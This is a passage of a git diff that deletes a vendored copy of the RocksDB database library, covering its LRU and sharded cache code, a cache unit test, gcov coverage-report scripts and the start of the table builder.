-  // High-pri pool size, equals to capacity * high_pri_pool_ratio.
-  // Remember the value to avoid recomputing each time.
-  double high_pri_pool_capacity_;
-
-  // Dummy head of LRU list.
-  // lru.prev is newest entry, lru.next is oldest entry.
-  // LRU contains items which can be evicted, ie reference only by cache
-  LRUHandle lru_;
-
-  // Pointer to head of low-pri pool in LRU list.
-  LRUHandle* lru_low_pri_;
-
-  // ------------^^^^^^^^^^^^^-----------
-  // Not frequently modified data members
-  // ------------------------------------
-  //
-  // We separate data members that are updated frequently from the ones that
-  // are not frequently updated so that they don't share the same cache line
-  // which will lead into false cache sharing
-  //
-  // ------------------------------------
-  // Frequently modified data members
-  // ------------vvvvvvvvvvvvv-----------
-  LRUHandleTable table_;
-
-  // Memory size for entries residing in the cache
-  size_t usage_;
-
-  // Memory size for entries residing only in the LRU list
-  size_t lru_usage_;
-
-  // mutex_ protects the following state.
-  // We don't count mutex_ as the cache's internal state so semantically we
-  // don't mind mutex_ invoking the non-const actions.
-  mutable port::Mutex mutex_;
-};
-
-class LRUCache : public ShardedCache {
- public:
-  LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit,
-           double high_pri_pool_ratio);
-  virtual ~LRUCache();
-  virtual const char* Name() const override { return "LRUCache"; }
-  virtual CacheShard* GetShard(int shard) override;
-  virtual const CacheShard* GetShard(int shard) const override;
-  virtual void* Value(Handle* handle) override;
-  virtual size_t GetCharge(Handle* handle) const override;
-  virtual uint32_t GetHash(Handle* handle) const override;
-  virtual void DisownData() override;
-
-  //  Retrieves number of elements in LRU, for unit test purpose only
-  size_t TEST_GetLRUSize();
-
- private:
-  LRUCacheShard* shards_;
-  int num_shards_ = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cache/lru_cache_test.cc b/thirdparty/rocksdb/cache/lru_cache_test.cc
deleted file mode 100644
index 1b83033..0000000
--- a/thirdparty/rocksdb/cache/lru_cache_test.cc
+++ /dev/null
@@ -1,172 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "cache/lru_cache.h"
-
-#include <string>
-#include <vector>
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class LRUCacheTest : public testing::Test {
- public:
-  LRUCacheTest() {}
-  ~LRUCacheTest() {}
-
-  void NewCache(size_t capacity, double high_pri_pool_ratio = 0.0) {
-    cache_.reset(
-#if defined(_MSC_VER)
-#pragma warning(push)
-#pragma warning(disable: 4316) // We've validated the alignment with the new operators
-#endif
-      new LRUCacheShard()
-#if defined(_MSC_VER)
-#pragma warning(pop)
-#endif
-    );
-    cache_->SetCapacity(capacity);
-    cache_->SetStrictCapacityLimit(false);
-    cache_->SetHighPriorityPoolRatio(high_pri_pool_ratio);
-  }
-
-  void Insert(const std::string& key,
-              Cache::Priority priority = Cache::Priority::LOW) {
-    cache_->Insert(key, 0 /*hash*/, nullptr /*value*/, 1 /*charge*/,
-                   nullptr /*deleter*/, nullptr /*handle*/, priority);
-  }
-
-  void Insert(char key, Cache::Priority priority = Cache::Priority::LOW) {
-    Insert(std::string(1, key), priority);
-  }
-
-  bool Lookup(const std::string& key) {
-    auto handle = cache_->Lookup(key, 0 /*hash*/);
-    if (handle) {
-      cache_->Release(handle);
-      return true;
-    }
-    return false;
-  }
-
-  bool Lookup(char key) { return Lookup(std::string(1, key)); }
-
-  void Erase(const std::string& key) { cache_->Erase(key, 0 /*hash*/); }
-
-  void ValidateLRUList(std::vector<std::string> keys,
-                       size_t num_high_pri_pool_keys = 0) {
-    LRUHandle* lru;
-    LRUHandle* lru_low_pri;
-    cache_->TEST_GetLRUList(&lru, &lru_low_pri);
-    LRUHandle* iter = lru;
-    bool in_high_pri_pool = false;
-    size_t high_pri_pool_keys = 0;
-    if (iter == lru_low_pri) {
-      in_high_pri_pool = true;
-    }
-    for (const auto& key : keys) {
-      iter = iter->next;
-      ASSERT_NE(lru, iter);
-      ASSERT_EQ(key, iter->key().ToString());
-      ASSERT_EQ(in_high_pri_pool, iter->InHighPriPool());
-      if (in_high_pri_pool) {
-        high_pri_pool_keys++;
-      }
-      if (iter == lru_low_pri) {
-        ASSERT_FALSE(in_high_pri_pool);
-        in_high_pri_pool = true;
-      }
-    }
-    ASSERT_EQ(lru, iter->next);
-    ASSERT_TRUE(in_high_pri_pool);
-    ASSERT_EQ(num_high_pri_pool_keys, high_pri_pool_keys);
-  }
-
- private:
-  std::unique_ptr<LRUCacheShard> cache_;
-};
-
-TEST_F(LRUCacheTest, BasicLRU) {
-  NewCache(5);
-  for (char ch = 'a'; ch <= 'e'; ch++) {
-    Insert(ch);
-  }
-  ValidateLRUList({"a", "b", "c", "d", "e"});
-  for (char ch = 'x'; ch <= 'z'; ch++) {
-    Insert(ch);
-  }
-  ValidateLRUList({"d", "e", "x", "y", "z"});
-  ASSERT_FALSE(Lookup("b"));
-  ValidateLRUList({"d", "e", "x", "y", "z"});
-  ASSERT_TRUE(Lookup("e"));
-  ValidateLRUList({"d", "x", "y", "z", "e"});
-  ASSERT_TRUE(Lookup("z"));
-  ValidateLRUList({"d", "x", "y", "e", "z"});
-  Erase("x");
-  ValidateLRUList({"d", "y", "e", "z"});
-  ASSERT_TRUE(Lookup("d"));
-  ValidateLRUList({"y", "e", "z", "d"});
-  Insert("u");
-  ValidateLRUList({"y", "e", "z", "d", "u"});
-  Insert("v");
-  ValidateLRUList({"e", "z", "d", "u", "v"});
-}
-
-TEST_F(LRUCacheTest, MidPointInsertion) {
-  // Allocate 2 cache entries to high-pri pool.
-  NewCache(5, 0.45);
-
-  Insert("a", Cache::Priority::LOW);
-  Insert("b", Cache::Priority::LOW);
-  Insert("c", Cache::Priority::LOW);
-  ValidateLRUList({"a", "b", "c"}, 0);
-
-  // Low-pri entries can take high-pri pool capacity if available
-  Insert("u", Cache::Priority::LOW);
-  Insert("v", Cache::Priority::LOW);
-  ValidateLRUList({"a", "b", "c", "u", "v"}, 0);
-
-  Insert("X", Cache::Priority::HIGH);
-  Insert("Y", Cache::Priority::HIGH);
-  ValidateLRUList({"c", "u", "v", "X", "Y"}, 2);
-
-  // High-pri entries can overflow to low-pri pool.
-  Insert("Z", Cache::Priority::HIGH);
-  ValidateLRUList({"u", "v", "X", "Y", "Z"}, 2);
-
-  // Low-pri entries will be inserted to head of low-pri pool.
-  Insert("a", Cache::Priority::LOW);
-  ValidateLRUList({"v", "X", "a", "Y", "Z"}, 2);
-
-  // Low-pri entries will be inserted to head of low-pri pool after lookup.
-  ASSERT_TRUE(Lookup("v"));
-  ValidateLRUList({"X", "a", "v", "Y", "Z"}, 2);
-
-  // High-pri entries will be inserted to the head of the list after lookup.
-  ASSERT_TRUE(Lookup("X"));
-  ValidateLRUList({"a", "v", "Y", "Z", "X"}, 2);
-  ASSERT_TRUE(Lookup("Z"));
-  ValidateLRUList({"a", "v", "Y", "X", "Z"}, 2);
-
-  Erase("Y");
-  ValidateLRUList({"a", "v", "X", "Z"}, 2);
-  Erase("X");
-  ValidateLRUList({"a", "v", "Z"}, 1);
-  Insert("d", Cache::Priority::LOW);
-  Insert("e", Cache::Priority::LOW);
-  ValidateLRUList({"a", "v", "d", "e", "Z"}, 1);
-  Insert("f", Cache::Priority::LOW);
-  Insert("g", Cache::Priority::LOW);
-  ValidateLRUList({"d", "e", "f", "g", "Z"}, 1);
-  ASSERT_TRUE(Lookup("d"));
-  ValidateLRUList({"e", "f", "g", "d", "Z"}, 1);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/cache/sharded_cache.cc b/thirdparty/rocksdb/cache/sharded_cache.cc
deleted file mode 100644
index 9bdea3a..0000000
--- a/thirdparty/rocksdb/cache/sharded_cache.cc
+++ /dev/null
@@ -1,161 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "cache/sharded_cache.h"
-
-#include <string>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-ShardedCache::ShardedCache(size_t capacity, int num_shard_bits,
-                           bool strict_capacity_limit)
-    : num_shard_bits_(num_shard_bits),
-      capacity_(capacity),
-      strict_capacity_limit_(strict_capacity_limit),
-      last_id_(1) {}
-
-void ShardedCache::SetCapacity(size_t capacity) {
-  int num_shards = 1 << num_shard_bits_;
-  const size_t per_shard = (capacity + (num_shards - 1)) / num_shards;
-  MutexLock l(&capacity_mutex_);
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->SetCapacity(per_shard);
-  }
-  capacity_ = capacity;
-}
-
-void ShardedCache::SetStrictCapacityLimit(bool strict_capacity_limit) {
-  int num_shards = 1 << num_shard_bits_;
-  MutexLock l(&capacity_mutex_);
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->SetStrictCapacityLimit(strict_capacity_limit);
-  }
-  strict_capacity_limit_ = strict_capacity_limit;
-}
-
-Status ShardedCache::Insert(const Slice& key, void* value, size_t charge,
-                            void (*deleter)(const Slice& key, void* value),
-                            Handle** handle, Priority priority) {
-  uint32_t hash = HashSlice(key);
-  return GetShard(Shard(hash))
-      ->Insert(key, hash, value, charge, deleter, handle, priority);
-}
-
-Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* stats) {
-  uint32_t hash = HashSlice(key);
-  return GetShard(Shard(hash))->Lookup(key, hash);
-}
-
-bool ShardedCache::Ref(Handle* handle) {
-  uint32_t hash = GetHash(handle);
-  return GetShard(Shard(hash))->Ref(handle);
-}
-
-bool ShardedCache::Release(Handle* handle, bool force_erase) {
-  uint32_t hash = GetHash(handle);
-  return GetShard(Shard(hash))->Release(handle, force_erase);
-}
-
-void ShardedCache::Erase(const Slice& key) {
-  uint32_t hash = HashSlice(key);
-  GetShard(Shard(hash))->Erase(key, hash);
-}
-
-uint64_t ShardedCache::NewId() {
-  return last_id_.fetch_add(1, std::memory_order_relaxed);
-}
-
-size_t ShardedCache::GetCapacity() const {
-  MutexLock l(&capacity_mutex_);
-  return capacity_;
-}
-
-bool ShardedCache::HasStrictCapacityLimit() const {
-  MutexLock l(&capacity_mutex_);
-  return strict_capacity_limit_;
-}
-
-size_t ShardedCache::GetUsage() const {
-  // We will not lock the cache when getting the usage from shards.
-  int num_shards = 1 << num_shard_bits_;
-  size_t usage = 0;
-  for (int s = 0; s < num_shards; s++) {
-    usage += GetShard(s)->GetUsage();
-  }
-  return usage;
-}
-
-size_t ShardedCache::GetUsage(Handle* handle) const {
-  return GetCharge(handle);
-}
-
-size_t ShardedCache::GetPinnedUsage() const {
-  // We will not lock the cache when getting the usage from shards.
-  int num_shards = 1 << num_shard_bits_;
-  size_t usage = 0;
-  for (int s = 0; s < num_shards; s++) {
-    usage += GetShard(s)->GetPinnedUsage();
-  }
-  return usage;
-}
-
-void ShardedCache::ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                          bool thread_safe) {
-  int num_shards = 1 << num_shard_bits_;
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->ApplyToAllCacheEntries(callback, thread_safe);
-  }
-}
-
-void ShardedCache::EraseUnRefEntries() {
-  int num_shards = 1 << num_shard_bits_;
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->EraseUnRefEntries();
-  }
-}
-
-std::string ShardedCache::GetPrintableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-  {
-    MutexLock l(&capacity_mutex_);
-    snprintf(buffer, kBufferSize, "    capacity : %" ROCKSDB_PRIszt "\n",
-             capacity_);
-    ret.append(buffer);
-    snprintf(buffer, kBufferSize, "    num_shard_bits : %d\n", num_shard_bits_);
-    ret.append(buffer);
-    snprintf(buffer, kBufferSize, "    strict_capacity_limit : %d\n",
-             strict_capacity_limit_);
-    ret.append(buffer);
-  }
-  ret.append(GetShard(0)->GetPrintableOptions());
-  return ret;
-}
-int GetDefaultCacheShardBits(size_t capacity) {
-  int num_shard_bits = 0;
-  size_t min_shard_size = 512L * 1024L;  // Every shard is at least 512KB.
-  size_t num_shards = capacity / min_shard_size;
-  while (num_shards >>= 1) {
-    if (++num_shard_bits >= 6) {
-      // No more than 6.
-      return num_shard_bits;
-    }
-  }
-  return num_shard_bits;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cache/sharded_cache.h b/thirdparty/rocksdb/cache/sharded_cache.h
deleted file mode 100644
index 4f9dea2..0000000
--- a/thirdparty/rocksdb/cache/sharded_cache.h
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <atomic>
-#include <string>
-
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-// Single cache shard interface.
-class CacheShard {
- public:
-  CacheShard() = default;
-  virtual ~CacheShard() = default;
-
-  virtual Status Insert(const Slice& key, uint32_t hash, void* value,
-                        size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Cache::Handle** handle, Cache::Priority priority) = 0;
-  virtual Cache::Handle* Lookup(const Slice& key, uint32_t hash) = 0;
-  virtual bool Ref(Cache::Handle* handle) = 0;
-  virtual bool Release(Cache::Handle* handle, bool force_erase = false) = 0;
-  virtual void Erase(const Slice& key, uint32_t hash) = 0;
-  virtual void SetCapacity(size_t capacity) = 0;
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) = 0;
-  virtual size_t GetUsage() const = 0;
-  virtual size_t GetPinnedUsage() const = 0;
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) = 0;
-  virtual void EraseUnRefEntries() = 0;
-  virtual std::string GetPrintableOptions() const { return ""; }
-};
-
-// Generic cache interface which shards cache by hash of keys. 2^num_shard_bits
-// shards will be created, with capacity split evenly to each of the shards.
-// Keys are sharded by the highest num_shard_bits bits of hash value.
-class ShardedCache : public Cache {
- public:
-  ShardedCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit);
-  virtual ~ShardedCache() = default;
-  virtual const char* Name() const override = 0;
-  virtual CacheShard* GetShard(int shard) = 0;
-  virtual const CacheShard* GetShard(int shard) const = 0;
-  virtual void* Value(Handle* handle) override = 0;
-  virtual size_t GetCharge(Handle* handle) const = 0;
-  virtual uint32_t GetHash(Handle* handle) const = 0;
-  virtual void DisownData() override = 0;
-
-  virtual void SetCapacity(size_t capacity) override;
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override;
-
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle, Priority priority) override;
-  virtual Handle* Lookup(const Slice& key, Statistics* stats) override;
-  virtual bool Ref(Handle* handle) override;
-  virtual bool Release(Handle* handle, bool force_erase = false) override;
-  virtual void Erase(const Slice& key) override;
-  virtual uint64_t NewId() override;
-  virtual size_t GetCapacity() const override;
-  virtual bool HasStrictCapacityLimit() const override;
-  virtual size_t GetUsage() const override;
-  virtual size_t GetUsage(Handle* handle) const override;
-  virtual size_t GetPinnedUsage() const override;
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override;
-  virtual void EraseUnRefEntries() override;
-  virtual std::string GetPrintableOptions() const override;
-
-  int GetNumShardBits() const { return num_shard_bits_; }
-
- private:
-  static inline uint32_t HashSlice(const Slice& s) {
-    return Hash(s.data(), s.size(), 0);
-  }
-
-  uint32_t Shard(uint32_t hash) {
-    // Note, hash >> 32 yields hash in gcc, not the zero we expect!
-    return (num_shard_bits_ > 0) ? (hash >> (32 - num_shard_bits_)) : 0;
-  }
-
-  int num_shard_bits_;
-  mutable port::Mutex capacity_mutex_;
-  size_t capacity_;
-  bool strict_capacity_limit_;
-  std::atomic<uint64_t> last_id_;
-};
-
-extern int GetDefaultCacheShardBits(size_t capacity);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cmake/RocksDBConfig.cmake.in b/thirdparty/rocksdb/cmake/RocksDBConfig.cmake.in
deleted file mode 100644
index b3cb2b2..0000000
--- a/thirdparty/rocksdb/cmake/RocksDBConfig.cmake.in
+++ /dev/null
@@ -1,3 +0,0 @@
-@PACKAGE_INIT@
-include("${CMAKE_CURRENT_LIST_DIR}/RocksDBTargets.cmake")
-check_required_components(RocksDB)
diff --git a/thirdparty/rocksdb/coverage/coverage_test.sh b/thirdparty/rocksdb/coverage/coverage_test.sh
deleted file mode 100755
index 6d87ae9..0000000
--- a/thirdparty/rocksdb/coverage/coverage_test.sh
+++ /dev/null
@@ -1,78 +0,0 @@
-#!/usr/bin/env bash
-
-# Exit on error.
-set -e
-
-if [ -n "$USE_CLANG" ]; then
-  echo "Error: Coverage test is supported only for gcc."
-  exit 1
-fi
-
-ROOT=".."
-# Fetch right version of gcov
-if [ -d /mnt/gvfs/third-party -a -z "$CXX" ]; then
-  source $ROOT/build_tools/fbcode_config.sh
-  GCOV=$GCC_BASE/bin/gcov
-else
-  GCOV=$(which gcov)
-fi
-
-COVERAGE_DIR="$PWD/COVERAGE_REPORT"
-mkdir -p $COVERAGE_DIR
-
-# Find all gcno files to generate the coverage report
-
-GCNO_FILES=`find $ROOT -name "*.gcno"`
-$GCOV --preserve-paths --relative-only --no-output $GCNO_FILES 2>/dev/null |
-  # Parse the raw gcov report to more human readable form.
-  python $ROOT/coverage/parse_gcov_output.py |
-  # Write the output to both stdout and report file.
-  tee $COVERAGE_DIR/coverage_report_all.txt &&
-echo -e "Generated coverage report for all files: $COVERAGE_DIR/coverage_report_all.txt\n"
-
-# TODO: we also need to get the files of the latest commits.
-# Get the most recently committed files.
-LATEST_FILES=`
-  git show --pretty="format:" --name-only HEAD |
-  grep -v "^$" |
-  paste -s -d,`
-RECENT_REPORT=$COVERAGE_DIR/coverage_report_recent.txt
-
-echo -e "Recently updated files: $LATEST_FILES\n" > $RECENT_REPORT
-$GCOV --preserve-paths --relative-only --no-output $GCNO_FILES 2>/dev/null |
-  python $ROOT/coverage/parse_gcov_output.py -interested-files $LATEST_FILES |
-  tee -a $RECENT_REPORT &&
-echo -e "Generated coverage report for recently updated files: $RECENT_REPORT\n"
-
-# Unless otherwise specified, we'll not generate html report by default
-if [ -z "$HTML" ]; then
-  exit 0
-fi
-
-# Generate the html report. If we cannot find lcov in this machine, we'll simply
-# skip this step.
-echo "Generating the html coverage report..."
-
-LCOV=$(which lcov || true 2>/dev/null)
-if [ -z $LCOV ]
-then
-  echo "Skip: Cannot find lcov to generate the html report."
-  exit 0
-fi
-
-LCOV_VERSION=$(lcov -v | grep 1.1 || true)
-if [ $LCOV_VERSION ]
-then
-  echo "Not supported lcov version. Expect lcov 1.1."
-  exit 0
-fi
-
-(cd $ROOT; lcov --no-external \
-     --capture  \
-     --directory $PWD \
-     --gcov-tool $GCOV \
-     --output-file $COVERAGE_DIR/coverage.info)
-
-genhtml $COVERAGE_DIR/coverage.info -o $COVERAGE_DIR
-
-echo "HTML Coverage report is generated in $COVERAGE_DIR"
diff --git a/thirdparty/rocksdb/coverage/parse_gcov_output.py b/thirdparty/rocksdb/coverage/parse_gcov_output.py
deleted file mode 100644
index 72e8b07..0000000
--- a/thirdparty/rocksdb/coverage/parse_gcov_output.py
+++ /dev/null
@@ -1,118 +0,0 @@
-import optparse
-import re
-import sys
-
-from optparse import OptionParser
-
-# the gcov report follows certain pattern. Each file will have two lines
-# of report, from which we can extract the file name, total lines and coverage
-# percentage.
-def parse_gcov_report(gcov_input):
-    per_file_coverage = {}
-    total_coverage = None
-
-    for line in sys.stdin:
-        line = line.strip()
-
-        # --First line of the coverage report (with file name in it)?
-        match_obj = re.match("^File '(.*)'$", line)
-        if match_obj:
-            # fetch the file name from the first line of the report.
-            current_file = match_obj.group(1)
-            continue
-
-        # -- Second line of the file report (with coverage percentage)
-        match_obj = re.match("^Lines executed:(.*)% of (.*)", line)
-
-        if match_obj:
-            coverage = float(match_obj.group(1))
-            lines = int(match_obj.group(2))
-
-            if current_file is not None:
-                per_file_coverage[current_file] = (coverage, lines)
-                current_file = None
-            else:
-                # If current_file is not set, we reach the last line of report,
-                # which contains the summarized coverage percentage.
-                total_coverage = (coverage, lines)
-            continue
-
-        # If the line's pattern doesn't fall into the above categories. We
-        # can simply ignore them since they're either empty line or doesn't
-        # find executable lines of the given file.
-        current_file = None
-
-    return per_file_coverage, total_coverage
-
-def get_option_parser():
-    usage = "Parse the gcov output and generate more human-readable code " +\
-            "coverage report."
-    parser = OptionParser(usage)
-
-    parser.add_option(
-        "--interested-files", "-i",
-        dest="filenames",
-        help="Comma separated files names. if specified, we will display " +
-             "the coverage report only for interested source files. " +
-             "Otherwise we will display the coverage report for all " +
-             "source files."
-    )
-    return parser
-
-def display_file_coverage(per_file_coverage, total_coverage):
-    # To print out auto-adjustable column, we need to know the longest
-    # length of file names.
-    max_file_name_length = max(
-        len(fname) for fname in per_file_coverage.keys()
-    )
-
-    # -- Print header
-    # size of separator is determined by 3 column sizes:
-    # file name, coverage percentage and lines.
-    header_template = \
-        "%" + str(max_file_name_length) + "s\t%s\t%s"
-    separator = "-" * (max_file_name_length + 10 + 20)
-    print header_template % ("Filename", "Coverage", "Lines")
-    print separator
-
-    # -- Print body
-    # template for printing coverage report for each file.
-    record_template = "%" + str(max_file_name_length) + "s\t%5.2f%%\t%10d"
-
-    for fname, coverage_info in per_file_coverage.items():
-        coverage, lines = coverage_info
-        print record_template % (fname, coverage, lines)
-
-    # -- Print footer
-    if total_coverage:
-        print separator
-        print record_template % ("Total", total_coverage[0], total_coverage[1])
-
-def report_coverage():
-    parser = get_option_parser()
-    (options, args) = parser.parse_args()
-
-    interested_files = set()
-    if options.filenames is not None:
-        interested_files = set(f.strip() for f in options.filenames.split(','))
-
-    # To make things simple, right now we only read gcov report from the input
-    per_file_coverage, total_coverage = parse_gcov_report(sys.stdin)
-
-    # Check if we need to display coverage info for interested files.
-    if len(interested_files):
-        per_file_coverage = dict(
-            (fname, per_file_coverage[fname]) for fname in interested_files
-            if fname in per_file_coverage
-        )
-        # If we only interested in several files, it makes no sense to report
-        # the total_coverage
-        total_coverage = None
-
-    if not len(per_file_coverage):
-        print >> sys.stderr, "Cannot find coverage info for the given files."
-        return
-    display_file_coverage(per_file_coverage, total_coverage)
-
-if __name__ == "__main__":
-    report_coverage()
diff --git a/thirdparty/rocksdb/db/builder.cc b/thirdparty/rocksdb/db/builder.cc
deleted file mode 100644
index 7cfa780..0000000
--- a/thirdparty/rocksdb/db/builder.cc
+++ /dev/null
@@ -1,227 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/builder.h"
-
-#include <algorithm>
-#include <deque>
-#include <vector>
-
-#include "db/compaction_iterator.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/internal_stats.h"
-#include "db/merge_helper.h"
-#include "db/table_cache.h"
-#include "db/version_edit.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_builder.h"
-#include "table/internal_iterator.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class TableFactory;
-
-TableBuilder* NewTableBuilder(
-    const ImmutableCFOptions& ioptions,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    WritableFileWriter* file, const CompressionType compression_type,
-    const CompressionOptions& compression_opts, int level,
-    const std::string* compression_dict, const bool skip_filters,
-    const uint64_t creation_time, const uint64_t oldest_key_time) {
-  assert((column_family_id ==
-          TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) ==
-         column_family_name.empty());
-  return ioptions.table_factory->NewTableBuilder(
-      TableBuilderOptions(
-          ioptions, internal_comparator, int_tbl_prop_collector_factories,
-          compression_type, compression_opts, compression_dict, skip_filters,
-          column_family_name, level, creation_time, oldest_key_time),
-      column_family_id, file);
-}
-
-Status BuildTable(
-    const std::string& dbname, Env* env, const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options,
-    TableCache* table_cache, InternalIterator* iter,
-    std::unique_ptr<InternalIterator> range_del_iter, FileMetaData* meta,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    std::vector<SequenceNumber> snapshots,
-    SequenceNumber earliest_write_conflict_snapshot,
-    const CompressionType compression,
-    const CompressionOptions& compression_opts, bool paranoid_file_checks,
-    InternalStats* internal_stats, TableFileCreationReason reason,
-    EventLogger* event_logger, int job_id, const Env::IOPriority io_priority,
-    TableProperties* table_properties, int level, const uint64_t creation_time,
-    const uint64_t oldest_key_time) {
-  assert((column_family_id ==
-          TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) ==
-         column_family_name.empty());
-  // Reports the IOStats for flush for every following bytes.
-  const size_t kReportFlushIOStatsEvery = 1048576;
-  Status s;
-  meta->fd.file_size = 0;
-  iter->SeekToFirst();
-  std::unique_ptr<RangeDelAggregator> range_del_agg(
-      new RangeDelAggregator(internal_comparator, snapshots));
-  s = range_del_agg->AddTombstones(std::move(range_del_iter));
-  if (!s.ok()) {
-    // may be non-ok if a range tombstone key is unparsable
-    return s;
-  }
-
-  std::string fname = TableFileName(ioptions.db_paths, meta->fd.GetNumber(),
-                                    meta->fd.GetPathId());
-#ifndef ROCKSDB_LITE
-  EventHelpers::NotifyTableFileCreationStarted(
-      ioptions.listeners, dbname, column_family_name, fname, job_id, reason);
-#endif  // !ROCKSDB_LITE
-  TableProperties tp;
-
-  if (iter->Valid() || range_del_agg->ShouldAddTombstones()) {
-    TableBuilder* builder;
-    unique_ptr<WritableFileWriter> file_writer;
-    {
-      unique_ptr<WritableFile> file;
-#ifndef NDEBUG
-      bool use_direct_writes = env_options.use_direct_writes;
-      TEST_SYNC_POINT_CALLBACK("BuildTable:create_file", &use_direct_writes);
-#endif  // !NDEBUG
-      s = NewWritableFile(env, fname, &file, env_options);
-      if (!s.ok()) {
-        EventHelpers::LogAndNotifyTableFileCreationFinished(
-            event_logger, ioptions.listeners, dbname, column_family_name, fname,
-            job_id, meta->fd, tp, reason, s);
-        return s;
-      }
-      file->SetIOPriority(io_priority);
-
-      file_writer.reset(new WritableFileWriter(std::move(file), env_options,
-                                               ioptions.statistics));
-      builder = NewTableBuilder(
-          ioptions, internal_comparator, int_tbl_prop_collector_factories,
-          column_family_id, column_family_name, file_writer.get(), compression,
-          compression_opts, level, nullptr /* compression_dict */,
-          false /* skip_filters */, creation_time, oldest_key_time);
-    }
-
-    MergeHelper merge(env, internal_comparator.user_comparator(),
-                      ioptions.merge_operator, nullptr, ioptions.info_log,
-                      true /* internal key corruption is not ok */,
-                      snapshots.empty() ? 0 : snapshots.back());
-
-    CompactionIterator c_iter(
-        iter, internal_comparator.user_comparator(), &merge, kMaxSequenceNumber,
-        &snapshots, earliest_write_conflict_snapshot, env,
-        true /* internal key corruption is not ok */, range_del_agg.get());
-    c_iter.SeekToFirst();
-    for (; c_iter.Valid(); c_iter.Next()) {
-      const Slice& key = c_iter.key();
-      const Slice& value = c_iter.value();
-      builder->Add(key, value);
-      meta->UpdateBoundaries(key, c_iter.ikey().sequence);
-
-      // TODO(noetzli): Update stats after flush, too.
-      if (io_priority == Env::IO_HIGH &&
-          IOSTATS(bytes_written) >= kReportFlushIOStatsEvery) {
-        ThreadStatusUtil::SetThreadOperationProperty(
-            ThreadStatus::FLUSH_BYTES_WRITTEN, IOSTATS(bytes_written));
-      }
-    }
-    // nullptr for table_{min,max} so all range tombstones will be flushed
-    range_del_agg->AddToBuilder(builder, nullptr /* lower_bound */,
-                                nullptr /* upper_bound */, meta);
-
-    // Finish and check for builder errors
-    bool empty = builder->NumEntries() == 0;
-    s = c_iter.status();
-    if (!s.ok() || empty) {
-      builder->Abandon();
-    } else {
-      s = builder->Finish();
-    }
-
-    if (s.ok() && !empty) {
-      uint64_t file_size = builder->FileSize();
-      meta->fd.file_size = file_size;
-      meta->marked_for_compaction = builder->NeedCompact();
-      assert(meta->fd.GetFileSize() > 0);
-      tp = builder->GetTableProperties();
